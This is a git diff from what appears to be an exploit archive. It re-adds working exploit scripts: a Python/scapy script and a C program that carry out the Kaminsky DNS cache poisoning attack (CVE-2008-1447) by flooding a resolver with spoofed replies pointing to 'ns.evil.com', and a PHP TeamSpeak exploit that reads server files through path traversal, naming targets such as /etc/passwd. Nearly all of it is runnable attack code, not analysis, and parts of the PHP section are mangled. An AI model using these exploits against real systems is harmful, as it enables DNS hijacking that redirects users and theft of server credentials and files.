USA - -# This script exploit the flaw discovered by Dan Kaminsky -# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 -# http://www.kb.cert.org/vuls/id/800113 - -# It tries to insert a dummy record in the vulnerable DNS server by guessing -# the transaction ID. -# It also insert Authority record for a valid record of the target domain. - -# To use this script, you have to discover the source port used by the vulnerable -# DNS server. -# Python is really slow, so it will take some time, but it works :-) - - -# IP to insert for our dummy record -targetip = "X.X.X.X" -# Vulnerable recursive DNS server -targetdns = "X.X.X.X" -# Authoritative NS for the target domain -srcdns = ["X.X.X.X"] - -# Domain to play with -dummydomain = "" -basedomain = ".example.com." -# sub-domain to claim authority on -domain = "sub.example.com." -# Spoofed authoritative DNS for the sub-domain -spoof="ns.evil.com." -# src port of vulnerable DNS for recursive queries -dnsport = 32883 - -# base packet -rep = IP(dst=targetdns, src=srcdns[0])/ \ - UDP(sport=53, dport=dnsport)/ \ - DNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, - qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), - an=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4), - ns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2) - ) - - -currentid = 1024 -dummyid = 3 -while 1: - dummydomain = "a" + str(dummyid) + basedomain - dummyid = dummyid + 1 - # request for our dummydomain - req = IP(dst=targetdns)/ \ - UDP(sport=random.randint(1025, 65000), dport=53)/ \ - DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, - qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), - an=0, - ns=0, - ar=0 - ) - send(req) - - # build the response - rep.getlayer(DNS).qd.qname = dummydomain - rep.getlayer(DNS).an.rrname = dummydomain - - for i in range(50): - # TXID - rep.getlayer(DNS).id = currentid - currentid = currentid + 1 - if currentid == 65536: - currentid = 1024 - - # len and chksum - rep.getlayer(UDP).len = IP(str(rep)).len-20 - rep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload)) - - print "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain) - send(rep, verbose=0) - - # check to see if it worked - req = IP(dst=targetdns)/ \ - UDP(sport=random.randint(1025, 65000), dport=53)/ \ - DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, - qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), - an=0, - ns=0, - ar=0 - ) - z = sr1(req, timeout=2, retry=0, verbose=0) - try: - if z[DNS].an.rdata == targetip: - print "Successfully poisonned our target with a dummy record !!" - break - except: - print "Poisonning failed" - -# milw0rm.com [2008-07-24] +from scapy import * +import random + +# Copyright (C) 2008 Julien Desfossez +# http://www.solisproject.net/ +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + +# This script exploit the flaw discovered by Dan Kaminsky +# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 +# http://www.kb.cert.org/vuls/id/800113 + +# It tries to insert a dummy record in the vulnerable DNS server by guessing +# the transaction ID. +# It also insert Authority record for a valid record of the target domain. + +# To use this script, you have to discover the source port used by the vulnerable +# DNS server. +# Python is really slow, so it will take some time, but it works :-) + + +# IP to insert for our dummy record +targetip = "X.X.X.X" +# Vulnerable recursive DNS server +targetdns = "X.X.X.X" +# Authoritative NS for the target domain +srcdns = ["X.X.X.X"] + +# Domain to play with +dummydomain = "" +basedomain = ".example.com." +# sub-domain to claim authority on +domain = "sub.example.com." +# Spoofed authoritative DNS for the sub-domain +spoof="ns.evil.com." +# src port of vulnerable DNS for recursive queries +dnsport = 32883 + +# base packet +rep = IP(dst=targetdns, src=srcdns[0])/ \ + UDP(sport=53, dport=dnsport)/ \ + DNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, + qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), + an=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4), + ns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2) + ) + + +currentid = 1024 +dummyid = 3 +while 1: + dummydomain = "a" + str(dummyid) + basedomain + dummyid = dummyid + 1 + # request for our dummydomain + req = IP(dst=targetdns)/ \ + UDP(sport=random.randint(1025, 65000), dport=53)/ \ + DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, + qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), + an=0, + ns=0, + ar=0 + ) + send(req) + + # build the response + rep.getlayer(DNS).qd.qname = dummydomain + rep.getlayer(DNS).an.rrname = dummydomain + + for i in range(50): + # TXID + rep.getlayer(DNS).id = currentid + currentid = currentid + 1 + if currentid == 65536: + currentid = 1024 + + # len and chksum + rep.getlayer(UDP).len = IP(str(rep)).len-20 + rep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload)) + + print "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain) + send(rep, verbose=0) + + # check to see if it worked + req = IP(dst=targetdns)/ \ + UDP(sport=random.randint(1025, 65000), dport=53)/ \ + DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, + qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), + an=0, + ns=0, + ar=0 + ) + z = sr1(req, timeout=2, retry=0, verbose=0) + try: + if z[DNS].an.rdata == targetip: + print "Successfully poisonned our target with a dummy record !!" + break + except: + print "Poisonning failed" + +# milw0rm.com [2008-07-24] diff --git a/platforms/multiple/remote/6130.c b/platforms/multiple/remote/6130.c index 99d798b4b..99b8008f4 100755 --- a/platforms/multiple/remote/6130.c +++ b/platforms/multiple/remote/6130.c @@ -1,364 +1,364 @@ -/* - * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack - * - * Compilation: - * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm - * - * Dependency: libdnet (aka libdumbnet-dev under Ubuntu) - * - * Author: marc.bevand at rapid7 dot com - */ - -#define _BSD_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define DNSF_RESPONSE (1<<15) -#define DNSF_AUTHORITATIVE (1<<10) -#define DNSF_REC_DESIRED (1<<8) -#define DNSF_REC_AVAILABLE (1<<7) - -#define TYPE_A 0x1 -#define TYPE_NS 0x2 -#define CLASS_IN 0x1 - -struct dns_pkt -{ - uint16_t txid; - uint16_t flags; - uint16_t nr_quest; - uint16_t nr_ans; - uint16_t nr_auth; - uint16_t nr_add; -} __attribute__ ((__packed__)); - -void format_domain(u_char *buf, unsigned size, unsigned *len, const char *name) -{ - unsigned bufi, i, j; - bufi = i = j = 0; - while (name[i]) - { - if (name[i] == '.') - { - if (bufi + 1 + (i - j) > size) - fprintf(stderr, "format_domain overflow\n"), exit(1); - buf[bufi++] = i - j; - memcpy(buf + bufi, name + j, i - j); - bufi += i - j; - j = i + 1; - } - i++; - } - if (bufi + 1 + 2 + 2 > size) - fprintf(stderr, "format_domain overflow\n"), exit(1); - buf[bufi++] = 0; - *len = bufi; -} - -void format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class) -{ - uint16_t tmp; - // name - format_domain(buf, size, len, name); - // type - tmp = htons(type); - memcpy(buf + *len, &tmp, sizeof (tmp)); - *len += sizeof (tmp); - // class - tmp = htons(class); - memcpy(buf + *len, &tmp, sizeof (tmp)); - *len += sizeof (tmp); -} - -void format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data) -{ - format_qr(buf, size, len, name, type, class); - // ttl - ttl = htonl(ttl); - memcpy(buf + *len, &ttl, sizeof (ttl)); - *len += sizeof (ttl); - // data length + data - uint16_t dlen; - struct addr addr; - switch (type) - { - case TYPE_A: - dlen = sizeof (addr.addr_ip); - break; - case TYPE_NS: - dlen = strlen(data) + 1; - break; - default: - fprintf(stderr, "format_rr: unknown type %02x", type); - exit(1); - } - dlen = htons(dlen); - memcpy(buf + *len, &dlen, sizeof (dlen)); - *len += sizeof (dlen); - // data - unsigned len2; - switch (type) - { - case TYPE_A: - if (addr_aton(data, &addr) < 0) - fprintf(stderr, "invalid destination IP: %s", data), exit(1); - memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip)); - *len += sizeof (addr.addr_ip); - break; - case TYPE_NS: - format_domain(buf + *len, size - *len, &len2, data); - *len += len2; - break; - default: - fprintf(stderr, "format_rr: unknown type %02x", type); - exit(1); - } -} - -void dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name) -{ - u_char *out = buf; - struct dns_pkt p = { - .txid = htons(txid), - .flags = htons(flags), - .nr_quest = htons(1), - .nr_ans = htons(0), - .nr_auth = htons(0), - .nr_add = htons(0), - }; - u_char qr[256]; - unsigned l; - format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN); - if (sizeof (p) + l > size) - fprintf(stderr, "dns_query overflow"), exit(1); - memcpy(out, &p, sizeof (p)); - out += sizeof (p); - memcpy(out, qr, l); - out += l; - *len = sizeof (p) + l; -} - -void dns_response(u_char *buf, unsigned size, unsigned *len, - uint16_t txid, uint16_t flags, - const char *q_name, const char *q_ip, - const char *domain, const char *auth_name, const char *auth_ip) -{ - u_char *out = buf; - u_char *end = buf + size; - u_char rec[256]; - unsigned l_rec; - uint32_t ttl = 24*3600; - struct dns_pkt p = { - .txid = htons(txid), - .flags = htons(flags), - .nr_quest = htons(1), - .nr_ans = htons(1), - .nr_auth = htons(1), - .nr_add = htons(1), - }; - (void)domain; - *len = 0; - if (out + *len + sizeof (p) > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p); - // queries - format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN); - if (out + *len + l_rec > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, rec, l_rec); *len += l_rec; - // answers - format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN, - ttl, q_ip); - if (out + *len + l_rec > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, rec, l_rec); *len += l_rec; - // authoritative nameservers - format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN, - ttl, auth_name); - if (out + *len + l_rec > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, rec, l_rec); *len += l_rec; - // additional records - format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN, - ttl, auth_ip); - if (out + *len + l_rec > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, rec, l_rec); *len += l_rec; -} - -unsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name) -{ - unsigned len = 0; - // ip - struct ip_hdr *ip = (struct ip_hdr *)buf; - ip->ip_hl = 5; - ip->ip_v = 4; - ip->ip_tos = 0; - ip->ip_id = rand() & 0xffff; - ip->ip_off = 0; - ip->ip_ttl = IP_TTL_MAX; - ip->ip_p = 17; // udp - ip->ip_sum = 0; - struct addr addr; - if (addr_aton(srcip, &addr) < 0) - fprintf(stderr, "invalid source IP: %s", srcip), exit(1); - ip->ip_src = addr.addr_ip; - if (addr_aton(dstip, &addr) < 0) - fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); - ip->ip_dst = addr.addr_ip; - // udp - struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); - udp->uh_sport = htons(1234); - udp->uh_dport = htons(53); - // dns - dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN, - (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, - rand(), DNSF_REC_DESIRED, name); - // udp len - len += UDP_HDR_LEN; - udp->uh_ulen = htons(len); - // ip len & cksum - len += IP_HDR_LEN; - ip->ip_len = htons(len); - ip_checksum(buf, len); - return len; -} - -unsigned build_response(u_char *buf, const char *srcip, const char *dstip, - uint16_t port_resolver, uint16_t txid, - const char *q_name, const char *q_ip, - const char *domain, const char *auth_name, const char *auth_ip) -{ - unsigned len = 0; - // ip - struct ip_hdr *ip = (struct ip_hdr *)buf; - ip->ip_hl = 5; - ip->ip_v = 4; - ip->ip_tos = 0; - ip->ip_id = rand() & 0xffff; - ip->ip_off = 0; - ip->ip_ttl = IP_TTL_MAX; - ip->ip_p = 17; // udp - ip->ip_sum = 0; - struct addr addr; - if (addr_aton(srcip, &addr) < 0) - fprintf(stderr, "invalid source IP: %s", srcip), exit(1); - ip->ip_src = addr.addr_ip; - if (addr_aton(dstip, &addr) < 0) - fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); - ip->ip_dst = addr.addr_ip; - // udp - struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); - udp->uh_sport = htons(53); - udp->uh_dport = htons(port_resolver); - // dns - dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN, - (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, - txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE, - q_name, q_ip, domain, auth_name, auth_ip); - // udp len - len += UDP_HDR_LEN; - udp->uh_ulen = htons(len); - // ip len & cksum - len += IP_HDR_LEN; - ip->ip_len = htons(len); - ip_checksum(buf, len); - return len; -} - -void usage(char *name) -{ - fprintf(stderr, "Usage: %s " - " \n" - " Source IP used when sending queries for random hostnames\n" - " (typically your IP)\n" - " Target DNS resolver to attack\n" - " One of the authoritative DNS servers for \n" - " Source port used by the resolver when forwarding queries\n" - " Poison the cache with the A record .\n" - " Domain name, see .\n" - " IP of your choice to be associated to .\n" - " Number of poisoning attemps, more attempts increase the\n" - " chance of successful poisoning, but also the attack time\n" - " Number of spoofed replies to send per attempt, more replies\n" - " increase the chance of successful poisoning but, but also\n" - " the rate of packet loss\n" - "Example:\n" - " $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\n" - "This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\n" - "in r.r.r.r's cache. The chance of successfully poisoning the resolver with\n" - "this example (8192 attempts and 16 replies/attempt) is 86%%\n" - "(1-(1-16/65536)**8192). This example also requires a bandwidth of about\n" - "2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\n" - "8 bits/byte) and takes about 80 secs to complete (8192 attempts /\n" - "100 attempts/sec).\n", - name, name); -} - -int main(int argc, char **argv) -{ - if (argc != 10) - usage(argv[0]), exit(1); - const char *querier = argv[1]; - const char *ip_resolver = argv[2]; - const char *ip_authoritative = argv[3]; - uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0); - const char *subhost = argv[5]; - const char *domain = argv[6]; - const char *anyip = argv[7]; - uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0); - uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0); - if (domain[strlen(domain) - 1 ] != '.') - fprintf(stderr, "domain must end with dot(.): %s\n", domain), exit(1); - printf("Chance of success: 1-(1-%d/65536)**%d = %.2f\n", replies, attempts, 1 - pow((1 - replies / 65536.), attempts)); - srand(time(NULL)); - int unique = rand() + (rand() << 16); - u_char buf[IP_LEN_MAX]; - unsigned len; - char name[256]; - char ns[256]; - ip_t *iph; - if ((iph = ip_open()) == NULL) - err(1, "ip_open"); - int cnt = 0; - while (cnt < attempts) - { - // send a query for a random hostname - snprintf(name, sizeof (name), "%08x%08x.%s", unique, cnt, domain); - len = build_query(buf, querier, ip_resolver, name); - if (ip_send(iph, buf, len) != len) - err(1, "ip_send"); - // give the resolver enough time to forward the query and be in a state - // where it waits for answers; sleeping 10ms here limits the number of - // attempts to 100 per sec - usleep(10000); - // send spoofed replies, each reply contains: - // - 1 query: query for the "random hostname" - // - 1 answer: "random hostname" A 1.1.1.1 - // - 1 authoritative nameserver: NS . - // - 1 additional record: . A - snprintf(ns, sizeof (ns), "%s.%s", subhost, domain); - unsigned r; - for (r = 0; r < replies; r++) - { - // use a txid that is just 'r': 0..(replies-1) - len = build_response(buf, ip_authoritative, ip_resolver, - port_resolver, r, name, "1.1.1.1", domain, ns, anyip); - if (ip_send(iph, buf, len) != len) - err(1, "ip_send"); - } - cnt++; - } - ip_close(iph); - return 0; -} - -// milw0rm.com [2008-07-25] +/* + * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack + * + * Compilation: + * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm + * + * Dependency: libdnet (aka libdumbnet-dev under Ubuntu) + * + * Author: marc.bevand at rapid7 dot com + */ + +#define _BSD_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define DNSF_RESPONSE (1<<15) +#define DNSF_AUTHORITATIVE (1<<10) +#define DNSF_REC_DESIRED (1<<8) +#define DNSF_REC_AVAILABLE (1<<7) + +#define TYPE_A 0x1 +#define TYPE_NS 0x2 +#define CLASS_IN 0x1 + +struct dns_pkt +{ + uint16_t txid; + uint16_t flags; + uint16_t nr_quest; + uint16_t nr_ans; + uint16_t nr_auth; + uint16_t nr_add; +} __attribute__ ((__packed__)); + +void format_domain(u_char *buf, unsigned size, unsigned *len, const char *name) +{ + unsigned bufi, i, j; + bufi = i = j = 0; + while (name[i]) + { + if (name[i] == '.') + { + if (bufi + 1 + (i - j) > size) + fprintf(stderr, "format_domain overflow\n"), exit(1); + buf[bufi++] = i - j; + memcpy(buf + bufi, name + j, i - j); + bufi += i - j; + j = i + 1; + } + i++; + } + if (bufi + 1 + 2 + 2 > size) + fprintf(stderr, "format_domain overflow\n"), exit(1); + buf[bufi++] = 0; + *len = bufi; +} + +void format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class) +{ + uint16_t tmp; + // name + format_domain(buf, size, len, name); + // type + tmp = htons(type); + memcpy(buf + *len, &tmp, sizeof (tmp)); + *len += sizeof (tmp); + // class + tmp = htons(class); + memcpy(buf + *len, &tmp, sizeof (tmp)); + *len += sizeof (tmp); +} + +void format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data) +{ + format_qr(buf, size, len, name, type, class); + // ttl + ttl = htonl(ttl); + memcpy(buf + *len, &ttl, sizeof (ttl)); + *len += sizeof (ttl); + // data length + data + uint16_t dlen; + struct addr addr; + switch (type) + { + case TYPE_A: + dlen = sizeof (addr.addr_ip); + break; + case TYPE_NS: + dlen = strlen(data) + 1; + break; + default: + fprintf(stderr, "format_rr: unknown type %02x", type); + exit(1); + } + dlen = htons(dlen); + memcpy(buf + *len, &dlen, sizeof (dlen)); + *len += sizeof (dlen); + // data + unsigned len2; + switch (type) + { + case TYPE_A: + if (addr_aton(data, &addr) < 0) + fprintf(stderr, "invalid destination IP: %s", data), exit(1); + memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip)); + *len += sizeof (addr.addr_ip); + break; + case TYPE_NS: + format_domain(buf + *len, size - *len, &len2, data); + *len += len2; + break; + default: + fprintf(stderr, "format_rr: unknown type %02x", type); + exit(1); + } +} + +void dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name) +{ + u_char *out = buf; + struct dns_pkt p = { + .txid = htons(txid), + .flags = htons(flags), + .nr_quest = htons(1), + .nr_ans = htons(0), + .nr_auth = htons(0), + .nr_add = htons(0), + }; + u_char qr[256]; + unsigned l; + format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN); + if (sizeof (p) + l > size) + fprintf(stderr, "dns_query overflow"), exit(1); + memcpy(out, &p, sizeof (p)); + out += sizeof (p); + memcpy(out, qr, l); + out += l; + *len = sizeof (p) + l; +} + +void dns_response(u_char *buf, unsigned size, unsigned *len, + uint16_t txid, uint16_t flags, + const char *q_name, const char *q_ip, + const char *domain, const char *auth_name, const char *auth_ip) +{ + u_char *out = buf; + u_char *end = buf + size; + u_char rec[256]; + unsigned l_rec; + uint32_t ttl = 24*3600; + struct dns_pkt p = { + .txid = htons(txid), + .flags = htons(flags), + .nr_quest = htons(1), + .nr_ans = htons(1), + .nr_auth = htons(1), + .nr_add = htons(1), + }; + (void)domain; + *len = 0; + if (out + *len + sizeof (p) > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p); + // queries + format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN); + if (out + *len + l_rec > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, rec, l_rec); *len += l_rec; + // answers + format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN, + ttl, q_ip); + if (out + *len + l_rec > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, rec, l_rec); *len += l_rec; + // authoritative nameservers + format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN, + ttl, auth_name); + if (out + *len + l_rec > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, rec, l_rec); *len += l_rec; + // additional records + format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN, + ttl, auth_ip); + if (out + *len + l_rec > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, rec, l_rec); *len += l_rec; +} + +unsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name) +{ + unsigned len = 0; + // ip + struct ip_hdr *ip = (struct ip_hdr *)buf; + ip->ip_hl = 5; + ip->ip_v = 4; + ip->ip_tos = 0; + ip->ip_id = rand() & 0xffff; + ip->ip_off = 0; + ip->ip_ttl = IP_TTL_MAX; + ip->ip_p = 17; // udp + ip->ip_sum = 0; + struct addr addr; + if (addr_aton(srcip, &addr) < 0) + fprintf(stderr, "invalid source IP: %s", srcip), exit(1); + ip->ip_src = addr.addr_ip; + if (addr_aton(dstip, &addr) < 0) + fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); + ip->ip_dst = addr.addr_ip; + // udp + struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); + udp->uh_sport = htons(1234); + udp->uh_dport = htons(53); + // dns + dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN, + (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, + rand(), DNSF_REC_DESIRED, name); + // udp len + len += UDP_HDR_LEN; + udp->uh_ulen = htons(len); + // ip len & cksum + len += IP_HDR_LEN; + ip->ip_len = htons(len); + ip_checksum(buf, len); + return len; +} + +unsigned build_response(u_char *buf, const char *srcip, const char *dstip, + uint16_t port_resolver, uint16_t txid, + const char *q_name, const char *q_ip, + const char *domain, const char *auth_name, const char *auth_ip) +{ + unsigned len = 0; + // ip + struct ip_hdr *ip = (struct ip_hdr *)buf; + ip->ip_hl = 5; + ip->ip_v = 4; + ip->ip_tos = 0; + ip->ip_id = rand() & 0xffff; + ip->ip_off = 0; + ip->ip_ttl = IP_TTL_MAX; + ip->ip_p = 17; // udp + ip->ip_sum = 0; + struct addr addr; + if (addr_aton(srcip, &addr) < 0) + fprintf(stderr, "invalid source IP: %s", srcip), exit(1); + ip->ip_src = addr.addr_ip; + if (addr_aton(dstip, &addr) < 0) + fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); + ip->ip_dst = addr.addr_ip; + // udp + struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); + udp->uh_sport = htons(53); + udp->uh_dport = htons(port_resolver); + // dns + dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN, + (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, + txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE, + q_name, q_ip, domain, auth_name, auth_ip); + // udp len + len += UDP_HDR_LEN; + udp->uh_ulen = htons(len); + // ip len & cksum + len += IP_HDR_LEN; + ip->ip_len = htons(len); + ip_checksum(buf, len); + return len; +} + +void usage(char *name) +{ + fprintf(stderr, "Usage: %s " + " \n" + " Source IP used when sending queries for random hostnames\n" + " (typically your IP)\n" + " Target DNS resolver to attack\n" + " One of the authoritative DNS servers for \n" + " Source port used by the resolver when forwarding queries\n" + " Poison the cache with the A record .\n" + " Domain name, see .\n" + " IP of your choice to be associated to .\n" + " Number of poisoning attemps, more attempts increase the\n" + " chance of successful poisoning, but also the attack time\n" + " Number of spoofed replies to send per attempt, more replies\n" + " increase the chance of successful poisoning but, but also\n" + " the rate of packet loss\n" + "Example:\n" + " $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\n" + "This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\n" + "in r.r.r.r's cache. The chance of successfully poisoning the resolver with\n" + "this example (8192 attempts and 16 replies/attempt) is 86%%\n" + "(1-(1-16/65536)**8192). This example also requires a bandwidth of about\n" + "2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\n" + "8 bits/byte) and takes about 80 secs to complete (8192 attempts /\n" + "100 attempts/sec).\n", + name, name); +} + +int main(int argc, char **argv) +{ + if (argc != 10) + usage(argv[0]), exit(1); + const char *querier = argv[1]; + const char *ip_resolver = argv[2]; + const char *ip_authoritative = argv[3]; + uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0); + const char *subhost = argv[5]; + const char *domain = argv[6]; + const char *anyip = argv[7]; + uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0); + uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0); + if (domain[strlen(domain) - 1 ] != '.') + fprintf(stderr, "domain must end with dot(.): %s\n", domain), exit(1); + printf("Chance of success: 1-(1-%d/65536)**%d = %.2f\n", replies, attempts, 1 - pow((1 - replies / 65536.), attempts)); + srand(time(NULL)); + int unique = rand() + (rand() << 16); + u_char buf[IP_LEN_MAX]; + unsigned len; + char name[256]; + char ns[256]; + ip_t *iph; + if ((iph = ip_open()) == NULL) + err(1, "ip_open"); + int cnt = 0; + while (cnt < attempts) + { + // send a query for a random hostname + snprintf(name, sizeof (name), "%08x%08x.%s", unique, cnt, domain); + len = build_query(buf, querier, ip_resolver, name); + if (ip_send(iph, buf, len) != len) + err(1, "ip_send"); + // give the resolver enough time to forward the query and be in a state + // where it waits for answers; sleeping 10ms here limits the number of + // attempts to 100 per sec + usleep(10000); + // send spoofed replies, each reply contains: + // - 1 query: query for the "random hostname" + // - 1 answer: "random hostname" A 1.1.1.1 + // - 1 authoritative nameserver: NS . + // - 1 additional record: . A + snprintf(ns, sizeof (ns), "%s.%s", subhost, domain); + unsigned r; + for (r = 0; r < replies; r++) + { + // use a txid that is just 'r': 0..(replies-1) + len = build_response(buf, ip_authoritative, ip_resolver, + port_resolver, r, name, "1.1.1.1", domain, ns, anyip); + if (ip_send(iph, buf, len) != len) + err(1, "ip_send"); + } + cnt++; + } + ip_close(iph); + return 0; +} + +// milw0rm.com [2008-07-25] diff --git a/platforms/multiple/remote/689.pl b/platforms/multiple/remote/689.pl index fc0640575..5b57c356c 100755 --- a/platforms/multiple/remote/689.pl +++ b/platforms/multiple/remote/689.pl @@ -94,6 +94,6 @@ EOT } exit 0; } -} - -# milw0rm.com [2004-12-15] +} + +# milw0rm.com [2004-12-15] diff --git a/platforms/multiple/remote/7760.php b/platforms/multiple/remote/7760.php index a910079f8..f5e7a3624 100755 --- a/platforms/multiple/remote/7760.php +++ b/platforms/multiple/remote/7760.php @@ -1,138 +1,138 @@ -
- -
-  ¬ teamspeak hostname or ip, for expamle "ts.antichat.ru" -  ¬ port to TCQquery admin, default 51234 -  ¬ file to read.'; -} - -function info() -{ - echo - '
- for example: - server.log - server.dbs - ../../../../../boot.ini - ../../../../../etc/passwd - ../../../../../usr/local/apache/conf/httpd.conf etc. - brain on ;) - - admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files. - - '; -} - -function head() -{ - echo ' - - -xek_teamspeak2 - - -'; -} - -head(); - -if (!$_GET) -{ - html(); - info(); -} - -if (isset($_GET['go_fuck'])) -{ - $hostname = $_POST['hostname']; - $file = $_POST['file']; - $port = $_POST['port']; - - if (isset($_POST['check_ver'])) - { - echo '
'.check_ver($hostname, 'ver', $port);
-		
-	}
-	
-	if (isset($_POST['parampampam']))
-	{
-		echo '';
-		html();
-		
-	}
-}
-
-?>
-
-# milw0rm.com [2009-01-14]
+

+	
+	

+	 ¬ teamspeak hostname or ip, for expamle "ts.antichat.ru"
+	 ¬ port to TCQquery admin, default 51234
+	 ¬ file to read.';
+}
+
+function info()
+{
+	echo
+	'

+	for example: 
+	server.log
+	server.dbs
+	../../../../../boot.ini
+	../../../../../etc/passwd
+	../../../../../usr/local/apache/conf/httpd.conf etc.
+	brain on ;)
+	
+	admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files.
+	
+	
+    
+    
+  
+   
+

+name="message"></textarea>

 
 
 
diff --git a/platforms/php/webapps/1395.php b/platforms/php/webapps/1395.php
index a1d545a8d..4a71851d7 100755
--- a/platforms/php/webapps/1395.php
+++ b/platforms/php/webapps/1395.php
